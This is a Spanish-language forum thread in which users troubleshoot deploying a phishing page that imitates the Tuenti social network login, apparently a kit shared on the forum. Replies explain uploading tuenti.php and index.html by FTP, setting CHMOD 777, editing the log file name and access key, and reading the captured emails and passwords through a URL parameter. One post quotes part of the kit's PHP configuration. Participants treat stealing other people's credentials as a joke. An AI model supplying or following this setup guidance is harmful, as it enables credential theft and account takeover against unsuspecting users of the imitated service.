likant escribió: 1-abiendo echo el dominio en esta web k cosas deberia hacer??
(segun lo k yo e entendido, primero haces el dominio k ya esta echo segundo configuras el php pero kiero saber esactamente k cosas tengo k tocar en el php )
Tienes que subir los archivos tuenti.php y index.html, modificando previamente el archivo tuenti.php (con el bloc de notas puedes)
likant escribió: 2-como subo el php a la web??
(por lo k he entendio hay k subirlo pero el caso esk nose, esta todo en ingles y mi ingles es algo escaso)
Tienes que subirlo con un cliente ftp
Saludos
ok muchas gracias ya lo configure y lo subi pero ahora una ultima duda jaja xD
ya he subio los dos archivos y lo he echo todo, ahora donde se supone k se crea el archivo en txt donde tendrian k apuntarse los logs?? en el php dice k se crea si no existe pero aciendo pruebas no ocurre nada... puedes meterte te loguea perfectamente esta todo super real pero y lo interesante de la bromita k es la pass y el correo??xDD
likant escribió:ok muchas gracias ya lo configure y lo subi pero ahora una ultima duda jaja xD
ya he subio los dos archivos y lo he echo todo, ahora donde se supone k se crea el archivo en txt donde tendrian k apuntarse los logs?? en el php dice k se crea si no existe pero aciendo pruebas no ocurre nada... puedes meterte te loguea perfectamente esta todo super real pero y lo interesante de la bromita k es la pass y el correo??xDD
Para leer los logs
[Enlace externo eliminado para invitados]XXX donde XXX es lo que pone en $leer='AQUI LO QUE QUIERAS'
pues me dice k no se encuentra el archivo >_< y lo he mirado todo como 20 veces por si se me ha escapado algo y nada kizas siga aciendo algo mal :s pero he mirao cada parte como se hacia kizas tenga k crear yo el txt o algo ya esk nose
likant escribió:pues me dice k no se encuentra el archivo >_< y lo he mirado todo como 20 veces por si se me ha escapado algo y nada kizas siga aciendo algo mal :s pero he mirao cada parte como se hacia kizas tenga k crear yo el txt o algo ya esk nose
Le as dado los permisos al archivo tuenti.php, si no se los das es normal que no cree el archivo xD
claro los permisos se los puse los volvi a mirar 2 o 3 veces ayer por si era eso y espere por si tenia k actualizarse algo y sigue sin funcionar, simplemente pongo la direccion para leer los logs y me dice k no encuentra el archivo( "[Enlace externo eliminado para invitados]") solo sale un enlace k redirecciona a la pagian donde tengo el dominio y los persmisos los puse tanto en el php como en el del index, kizas sea pork se los di tambien al index o eso no importa??
tambien he probado a crear el txt con el nombre k especifique en el php pero nada ya pienso k me tienen mania en el dominio o algo xD
likant escribió:claro los permisos se los puse los volvi a mirar 2 o 3 veces ayer por si era eso y espere por si tenia k actualizarse algo y sigue sin funcionar, simplemente pongo la direccion para leer los logs y me dice k no encuentra el archivo( "[Enlace externo eliminado para invitados]") solo sale un enlace k redirecciona a la pagian donde tengo el dominio y los persmisos los puse tanto en el php como en el del index, kizas sea pork se los di tambien al index o eso no importa??
tambien he probado a crear el txt con el nombre k especifique en el php pero nada ya pienso k me tienen mania en el dominio o algo xD
No tiene nada que ver que le hayas dado permisos al index.html, mandame por privado o por aqui mismo, unas capturas de como tienes configurado el archivo tuenti.php y de tu ftp
Un saludo
** [Enlace externo eliminado para invitados] -> donde XXXX tienes k escribor lo que as puesto **
** en 'leerclaves', asegurate de asignar permisos CHMOD 777 ** *****************************************************************************************/

//***** MODIFICAR ****************************************************************
$archivo = 'load.txt'; //Cambiale el nombre para que nadie pueda verlo
$leer = 'home';
//*********************************************************************************

eso es lo k toke del php no vi nada mas k ubiera k tocar, si esk hay algo mas k no he visto pues me lo dices.
en las capturas del ftp k te enseño?? esk pa subir una foto me tiro años xD y si vamos al bulto mejor,
dime esactamente k te enseño y las subo lo antes posible
likant escribió:** [Enlace externo eliminado para invitados] -> donde XXXX tienes k escribor lo que as puesto **
Ya se el fallo
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados].php?le=home
te falta lo que esta en rojo. Otra cosa, no se te a creado el archivo, supongo que porque no le as asignado bien los permisos
Un saludo
jajaja ya pude porfin :p gracias por haverme aguantao sod y por haverme enseñao ya seguro k no me ekivoco mas jeje espero k algun dia de estos puedas disfrutar de uno d emsi aportes siesk mi torpeza me deja claro
Buenas, para empezar muy buena Sod pero.... no me funciona!! jeje

me pasa lo mismo que a likant, tengo los permisos dados y he modificado el tuenti.php.

pero no me crea el txt, ni aun subiendo el txt con el nombre correspondiente.

la direccion es la siguiente: http:\\[Enlace externo eliminado para invitados]
mira ami tampoco me creaba el archibo txt y lo cree yo mismo y lo subi y ahora al escribir la direccion en el navegador para ver los logs no me muestra absolutamente nada pero si voy el ftp y veo el archivo txt ahi si puedo ver lo k hay escrito a lo mejor es lo k te pasa a ti. suerte
Pues ahora si me muestra el txt pero vacio!
¿Que hago mal?

si ya as creao el txt y con la direccion web te lo muestra en blanco como yo pues ves al ftp y lo ves desde ayi el txt es lo unico k se me ocurre pork si lo demas lo tienes bien puesto.. ami me pasa eso, no me muestra nada pero viendolo desde el ftp si, de todas formas haver si sod se le ocurre algo k pueda ser...
likant escribió:mira ami tampoco me creaba el archibo txt y lo cree yo mismo y lo subi y ahora al escribir la direccion en el navegador para ver los logs no me muestra absolutamente nada pero si voy el ftp y veo el archivo txt ahi si puedo ver lo k hay escrito a lo mejor es lo k te pasa a ti. suerte
likant escribió:si ya as creao el txt y con la direccion web te lo muestra en blanco como yo pues ves al ftp y lo ves desde ayi el txt es lo unico k se me ocurre pork si lo demas lo tienes bien puesto.. ami me pasa eso, no me muestra nada pero viendolo desde el ftp si, de todas formas haver si sod se le ocurre algo k pueda ser...
¿Que navegador usais?, yo con Firefox me va bien, si usais el internet explorer y seguis queriendo usarlo, en vez de ".txt" poner ".htm"
Un saludo

Volver a “Nuestros Programas”